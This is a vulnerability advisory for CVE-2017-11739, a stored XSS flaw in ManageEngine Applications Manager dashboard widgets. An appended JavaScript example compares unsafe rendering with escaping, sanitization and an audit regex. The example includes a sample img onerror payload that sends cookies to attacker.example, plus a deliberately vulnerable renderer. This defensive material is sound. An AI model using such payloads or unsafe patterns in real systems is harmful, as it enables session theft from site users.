First published: Thu May 23 2019
In Zoho ManageEngine Applications Manager 13.1 Build 13100, an authenticated user with administrative privileges can add a widget to any dashboard. The widget can be a "Utility Widget" whose "Custom HTML or Text" field is stored and then rendered, unescaped, on the dashboard where it was added. An attacker with such an account can abuse this by creating a Utility Widget containing malicious JavaScript, which executes in the browser of every user who views that dashboard: a stored cross-site scripting (XSS) issue.
Credit: cve@mitre.org
Affected Software | Affected Version | How to fix
---|---|---
Zohocorp ManageEngine Applications Manager | =13.1-13100 | Update to an unaffected version
CVE-2017-11739 is a stored cross-site scripting vulnerability in Zoho ManageEngine Applications Manager 13.1 Build 13100. An authenticated user with administrative privileges can add a Utility Widget with a Custom HTML or Text field to any dashboard, and the field's contents are rendered without sanitisation, so JavaScript placed in it runs in the browser of anyone who views that dashboard.
The severity of CVE-2017-11739 is medium, with a CVSS base score of 6.1.
CVE-2017-11739 affects Zoho ManageEngine Applications Manager 13.1 Build 13100. Exploitation requires an account that already holds administrative privileges; the impact falls on every other user whose browser loads a dashboard carrying the malicious widget.
An attacker with an administrative account exploits CVE-2017-11739 by saving a widget whose Custom HTML or Text field contains script-bearing markup. Because the payload is stored server-side, it executes in the session of each user who later opens that dashboard, which can expose that user's session or let the attacker act as them. This is script execution in the victim's browser, not code execution on the Applications Manager host.
Yes, a fix is available for CVE-2017-11739. Users should update to a version of Zoho ManageEngine Applications Manager that is not affected by this vulnerability (the affected build is 13.1 Build 13100). Until the upgrade is applied, review existing dashboards for Utility Widgets whose Custom HTML or Text field contains script tags or event-handler attributes.
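The rendering behaviour the description and the exploitation answer above refer to, placed beside the kind of fix the last answer points at, as an added example. This is not ManageEngine code and not the vendor's patch: the function names are hypothetical, the widget body is a constructed sample, and the allowlist sanitizer is deliberately minimal to show the idea (production code should use a maintained library such as DOMPurify).

```javascript
// Added example (not ManageEngine code): contrast the behaviour CVE-2017-11739
// describes, a "Custom HTML or Text" widget body inserted into the dashboard
// as-is, with two defensive renderings and an audit check. All names are
// hypothetical and the widget body is a constructed sample.

// Constructed sample of what an administrator could store in the widget field.
const WIDGET_BODY =
  '<b>Status</b> <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable pattern: the stored body is concatenated into the page unchanged,
// so markup with an event handler runs in the browser of every dashboard viewer.
function renderWidgetUnsafe(body) {
  return `<div class="widget">${body}</div>`;
}

// Option 1: treat the field as text. The characters that can open markup are
// escaped, so the body is displayed literally and nothing in it executes.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (ch) => map[ch]);
}
function renderWidgetAsText(body) {
  return `<div class="widget">${escapeHtml(body)}</div>`;
}

// Option 2: keep "Custom HTML" but only for an allowlist of formatting tags
// carrying no attributes; every other tag, and all text, is escaped. Minimal
// sanitizer for illustration only; use a maintained library in production.
const ALLOWED_TAGS = new Set(['b', 'i', 'u', 'p', 'br', 'ul', 'ol', 'li', 'strong', 'em']);
function sanitizeHtml(body) {
  // Tokenise into whole tags, runs of text, and stray "<" characters.
  return body.replace(/<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>|[^<]+|</g, (tok, tag, attrs) => {
    if (tag === undefined) return escapeHtml(tok);            // text or lone "<"
    const name = tag.toLowerCase();
    const rest = attrs.replace(/\/\s*$/, '').trim();           // tolerate "<br/>"
    if (!ALLOWED_TAGS.has(name) || rest !== '') return escapeHtml(tok);
    return tok.startsWith('</') ? `</${name}>` : `<${name}>`;
  });
}
function renderWidgetSanitized(body) {
  return `<div class="widget">${sanitizeHtml(body)}</div>`;
}

// Audit heuristic for an unpatched build: flag stored widget bodies that carry
// script-capable constructs so an operator can review existing dashboards.
function hasActiveContent(body) {
  return /<script\b|<\/script|\bon[a-z]+\s*=|javascript:|<(iframe|object|embed|svg|math)\b/i.test(body);
}

console.log(renderWidgetUnsafe(WIDGET_BODY));
console.log(renderWidgetSanitized(WIDGET_BODY));
console.log('needs review:', hasActiveContent(WIDGET_BODY));
```

Run it with `node` and compare the first two printed lines: the unsafe rendering still carries the `onerror` handler, while the sanitized one keeps the `<b>` formatting and turns the `<img>` tag into inert text. `hasActiveContent` is a coarse audit filter, not a security boundary; it will produce some false positives and exists only to shortlist widgets for manual review.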